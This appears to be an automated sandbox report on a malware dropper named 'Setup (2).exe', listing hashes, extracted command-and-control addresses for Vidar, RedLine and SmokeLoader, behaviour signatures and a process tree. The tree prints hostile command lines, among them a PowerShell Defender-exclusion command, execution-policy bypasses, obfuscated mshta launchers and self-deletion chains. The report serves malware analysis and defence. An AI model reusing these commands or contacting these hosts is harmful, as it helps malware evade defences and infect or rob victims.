Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1414s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-08-2021 15:20

General

  • Target

    Setup (2).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

973

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    973

Extracted

Family

redline

Botnet

1

C2

37.0.8.88:44263

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 17 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 15 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2852
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        PID:2756
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:5500
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2608
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2576
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1376
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1180
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:68
                      • C:\Users\Admin\AppData\Roaming\btsitav
                        C:\Users\Admin\AppData\Roaming\btsitav
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:7564
                        • C:\Users\Admin\AppData\Roaming\btsitav
                          C:\Users\Admin\AppData\Roaming\btsitav
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6680
                      • C:\Users\Admin\AppData\Roaming\btsitav
                        C:\Users\Admin\AppData\Roaming\btsitav
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:6416
                        • C:\Users\Admin\AppData\Roaming\btsitav
                          C:\Users\Admin\AppData\Roaming\btsitav
                          3⤵
                          • Checks computer location settings
                          • Checks whether UAC is enabled
                          • Drops file in Windows directory
                          • Checks SCSI registry key(s)
                          • Modifies Control Panel
                          • Modifies Internet Explorer settings
                          • Modifies registry class
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:8836
                      • C:\Users\Admin\AppData\Roaming\btsitav
                        C:\Users\Admin\AppData\Roaming\btsitav
                        2⤵
                          PID:4256
                          • C:\Users\Admin\AppData\Roaming\btsitav
                            C:\Users\Admin\AppData\Roaming\btsitav
                            3⤵
                              PID:5636
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:340
                          • C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:636
                            • C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                              "C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3464
                              • C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                                C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                                3⤵
                                • Executes dropped EXE
                                PID:4964
                              • C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                                C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                                3⤵
                                • Executes dropped EXE
                                PID:4176
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 24
                                  4⤵
                                  • Program crash
                                  PID:212
                              • C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                                C:\Users\Admin\Documents\fOuCamuGtxSiwjmw75Zz5m4y.exe
                                3⤵
                                • Executes dropped EXE
                                PID:4736
                            • C:\Users\Admin\Documents\R1FP6s6fw0A8v8prbub5phv0.exe
                              "C:\Users\Admin\Documents\R1FP6s6fw0A8v8prbub5phv0.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2552
                              • C:\Users\Admin\Documents\R1FP6s6fw0A8v8prbub5phv0.exe
                                "C:\Users\Admin\Documents\R1FP6s6fw0A8v8prbub5phv0.exe"
                                3⤵
                                  PID:4712
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4252
                              • C:\Users\Admin\Documents\ozyrYY7iY8h0_1WTWvTK1gyL.exe
                                "C:\Users\Admin\Documents\ozyrYY7iY8h0_1WTWvTK1gyL.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2200
                                • C:\Users\Admin\Documents\ozyrYY7iY8h0_1WTWvTK1gyL.exe
                                  C:\Users\Admin\Documents\ozyrYY7iY8h0_1WTWvTK1gyL.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4812
                              • C:\Users\Admin\Documents\XGmzyOBYfZX4Y4_SBh0RT_UD.exe
                                "C:\Users\Admin\Documents\XGmzyOBYfZX4Y4_SBh0RT_UD.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3160
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 660
                                  3⤵
                                  • Program crash
                                  PID:4880
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 676
                                  3⤵
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5116
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 720
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4224
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 744
                                  3⤵
                                  • Program crash
                                  PID:4872
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1160
                                  3⤵
                                  • Program crash
                                  PID:3168
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1120
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2280
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1116
                                  3⤵
                                  • Program crash
                                  PID:4520
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 1148
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2268
                              • C:\Users\Admin\Documents\VlpZHmNbmGdteOmxqVJqeU3o.exe
                                "C:\Users\Admin\Documents\VlpZHmNbmGdteOmxqVJqeU3o.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3904
                                • C:\Users\Admin\Documents\VlpZHmNbmGdteOmxqVJqeU3o.exe
                                  "C:\Users\Admin\Documents\VlpZHmNbmGdteOmxqVJqeU3o.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:3756
                              • C:\Users\Admin\Documents\ZqpyEtsbY4fwYoyBNtCbIDxK.exe
                                "C:\Users\Admin\Documents\ZqpyEtsbY4fwYoyBNtCbIDxK.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:4068
                                • C:\Windows\SysWOW64\rundll32.exe
                                  C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\ZQPYET~1.DLL,s C:\Users\Admin\DOCUME~1\ZQPYET~1.EXE
                                  3⤵
                                  • Blocklisted process makes network request
                                  • Loads dropped DLL
                                  • Drops file in Program Files directory
                                  PID:3156
                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ZQPYET~1.DLL,cGEP
                                    4⤵
                                    • Blocklisted process makes network request
                                    • Checks processor information in registry
                                    • Modifies system certificate store
                                    PID:5348
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\ZQPYET~1.DLL
                                      5⤵
                                        PID:8092
                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ZQPYET~1.DLL,VBw3
                                        5⤵
                                        • Suspicious use of SetThreadContext
                                        • Checks processor information in registry
                                        PID:1664
                                        • C:\Windows\system32\rundll32.exe
                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                          6⤵
                                          • Checks SCSI registry key(s)
                                          • Modifies Internet Explorer settings
                                          PID:9036
                                          • C:\Windows\system32\ctfmon.exe
                                            ctfmon.exe
                                            7⤵
                                              PID:1128
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp52D.tmp.ps1"
                                          5⤵
                                            PID:8232
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp7373.tmp.ps1"
                                            5⤵
                                              PID:8384
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                6⤵
                                                  PID:7044
                                                • C:\Windows\SysWOW64\nslookup.exe
                                                  "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                  6⤵
                                                    PID:744
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                  5⤵
                                                    PID:2304
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                    5⤵
                                                    • Modifies Internet Explorer settings
                                                    PID:6948
                                            • C:\Users\Admin\Documents\fPgM0G3n7rhaijLDD_pL2u0p.exe
                                              "C:\Users\Admin\Documents\fPgM0G3n7rhaijLDD_pL2u0p.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:2224
                                              • C:\Users\Admin\Documents\fPgM0G3n7rhaijLDD_pL2u0p.exe
                                                "C:\Users\Admin\Documents\fPgM0G3n7rhaijLDD_pL2u0p.exe"
                                                3⤵
                                                  PID:4060
                                              • C:\Users\Admin\Documents\91b_xG4UC6wvh0AfGBHgwES6.exe
                                                "C:\Users\Admin\Documents\91b_xG4UC6wvh0AfGBHgwES6.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1036
                                              • C:\Users\Admin\Documents\n_zf2lCd7iqr37UhHsvOITg6.exe
                                                "C:\Users\Admin\Documents\n_zf2lCd7iqr37UhHsvOITg6.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1000
                                              • C:\Users\Admin\Documents\iXuyYnQI0maIV3eqPgaM8iuo.exe
                                                "C:\Users\Admin\Documents\iXuyYnQI0maIV3eqPgaM8iuo.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                PID:1796
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im iXuyYnQI0maIV3eqPgaM8iuo.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\iXuyYnQI0maIV3eqPgaM8iuo.exe" & del C:\ProgramData\*.dll & exit
                                                  3⤵
                                                    PID:5628
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im iXuyYnQI0maIV3eqPgaM8iuo.exe /f
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:2900
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 6
                                                      4⤵
                                                      • Delays execution with timeout.exe
                                                      PID:6712
                                                • C:\Users\Admin\Documents\hvdWqClk8bbybF0FZWFjDNPU.exe
                                                  "C:\Users\Admin\Documents\hvdWqClk8bbybF0FZWFjDNPU.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:3384
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\hvdWqClk8bbybF0FZWFjDNPU.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\hvdWqClk8bbybF0FZWFjDNPU.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                    3⤵
                                                      PID:4952
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\hvdWqClk8bbybF0FZWFjDNPU.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\hvdWqClk8bbybF0FZWFjDNPU.exe" ) do taskkill -f -iM "%~NxA"
                                                        4⤵
                                                          PID:5724
                                                          • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                            hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:6032
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                              6⤵
                                                                PID:5828
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                  7⤵
                                                                    PID:5764
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                  6⤵
                                                                  • Loads dropped DLL
                                                                  PID:6640
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill -f -iM "hvdWqClk8bbybF0FZWFjDNPU.exe"
                                                                5⤵
                                                                • Kills process with taskkill
                                                                PID:3232
                                                        • C:\Users\Admin\Documents\_nC2EOcl43xMFddfhK8fAc1I.exe
                                                          "C:\Users\Admin\Documents\_nC2EOcl43xMFddfhK8fAc1I.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks processor information in registry
                                                          PID:2804
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im _nC2EOcl43xMFddfhK8fAc1I.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\_nC2EOcl43xMFddfhK8fAc1I.exe" & del C:\ProgramData\*.dll & exit
                                                            3⤵
                                                              PID:5736
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im _nC2EOcl43xMFddfhK8fAc1I.exe /f
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Kills process with taskkill
                                                                PID:4328
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 6
                                                                4⤵
                                                                • Delays execution with timeout.exe
                                                                PID:6464
                                                          • C:\Users\Admin\Documents\J2owPAUGQjmOpvZIfDOZ3EEB.exe
                                                            "C:\Users\Admin\Documents\J2owPAUGQjmOpvZIfDOZ3EEB.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3540
                                                            • C:\Users\Admin\Documents\J2owPAUGQjmOpvZIfDOZ3EEB.exe
                                                              "C:\Users\Admin\Documents\J2owPAUGQjmOpvZIfDOZ3EEB.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5088
                                                          • C:\Users\Admin\Documents\JGl2Cem4TMz2gb2tZV6ex4X8.exe
                                                            "C:\Users\Admin\Documents\JGl2Cem4TMz2gb2tZV6ex4X8.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2920
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 484
                                                              3⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4704
                                                          • C:\Users\Admin\Documents\OdbJZXJnT5BElA9N_rpC_5MO.exe
                                                            "C:\Users\Admin\Documents\OdbJZXJnT5BElA9N_rpC_5MO.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1156
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im OdbJZXJnT5BElA9N_rpC_5MO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\OdbJZXJnT5BElA9N_rpC_5MO.exe" & del C:\ProgramData\*.dll & exit
                                                              3⤵
                                                                PID:188
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im OdbJZXJnT5BElA9N_rpC_5MO.exe /f
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  PID:2204
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 6
                                                                  4⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:5944
                                                            • C:\Users\Admin\Documents\CVtpcNtrojIi9bczUlkTsrMd.exe
                                                              "C:\Users\Admin\Documents\CVtpcNtrojIi9bczUlkTsrMd.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:1724
                                                              • C:\Users\Admin\Documents\CVtpcNtrojIi9bczUlkTsrMd.exe
                                                                "C:\Users\Admin\Documents\CVtpcNtrojIi9bczUlkTsrMd.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:6232
                                                            • C:\Users\Admin\Documents\Y643TsNZoE3CWoVkhfhTqBX3.exe
                                                              "C:\Users\Admin\Documents\Y643TsNZoE3CWoVkhfhTqBX3.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4184
                                                            • C:\Users\Admin\Documents\K4jhHoT1H3pgdnpkYVNtPa_h.exe
                                                              "C:\Users\Admin\Documents\K4jhHoT1H3pgdnpkYVNtPa_h.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:4144
                                                            • C:\Users\Admin\Documents\OM3aKzyEGIUeNPcqKcDvn1ON.exe
                                                              "C:\Users\Admin\Documents\OM3aKzyEGIUeNPcqKcDvn1ON.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:1868
                                                              • C:\Users\Admin\Documents\OM3aKzyEGIUeNPcqKcDvn1ON.exe
                                                                "C:\Users\Admin\Documents\OM3aKzyEGIUeNPcqKcDvn1ON.exe" -q
                                                                3⤵
                                                                  PID:4252
                                                              • C:\Users\Admin\Documents\EAIbE1J8PTDkC7Gf2aMII5iQ.exe
                                                                "C:\Users\Admin\Documents\EAIbE1J8PTDkC7Gf2aMII5iQ.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4500
                                                                • C:\Users\Admin\Documents\EAIbE1J8PTDkC7Gf2aMII5iQ.exe
                                                                  C:\Users\Admin\Documents\EAIbE1J8PTDkC7Gf2aMII5iQ.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:1200
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1200 -s 1244
                                                                    4⤵
                                                                    • Program crash
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2548
                                                              • C:\Users\Admin\Documents\b9NkWh7Fvai3VM3TxkxGpdyn.exe
                                                                "C:\Users\Admin\Documents\b9NkWh7Fvai3VM3TxkxGpdyn.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4680
                                                                • C:\Users\Admin\Documents\b9NkWh7Fvai3VM3TxkxGpdyn.exe
                                                                  C:\Users\Admin\Documents\b9NkWh7Fvai3VM3TxkxGpdyn.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:416
                                                              • C:\Users\Admin\Documents\lCCCfRn_0oTOk8ooaBV_amfq.exe
                                                                "C:\Users\Admin\Documents\lCCCfRn_0oTOk8ooaBV_amfq.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:4396
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 664
                                                                  3⤵
                                                                  • Program crash
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4732
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 660
                                                                  3⤵
                                                                  • Program crash
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4504
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 716
                                                                  3⤵
                                                                  • Program crash
